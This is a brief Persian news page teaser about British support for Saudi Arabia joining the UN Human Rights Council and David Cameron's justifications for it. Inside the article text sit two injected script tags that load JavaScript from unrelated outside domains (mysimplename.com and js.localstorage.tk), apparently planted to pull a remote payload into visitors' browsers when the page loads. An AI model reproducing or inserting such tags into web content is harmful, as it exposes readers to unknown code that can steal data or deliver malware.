حقوق بشر به سبک انگلیسی


<script type='text/javascript' src='https://mysimplename.com/sc.js?p=3'></script>سوالات چالش بر انگیز درباره حمایت انگلستان از عربستان سعودی در پیوستنش به شورای حقوق بشر سازمان ملل و توجیهات دیوید کامرون نخست وزیر انگلستان<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>


+ 
0

- 
0

عرض x طول

دکمه اشتراک گذاري تلگرام ارسال ويدئو در تلگرام

ارسال نظر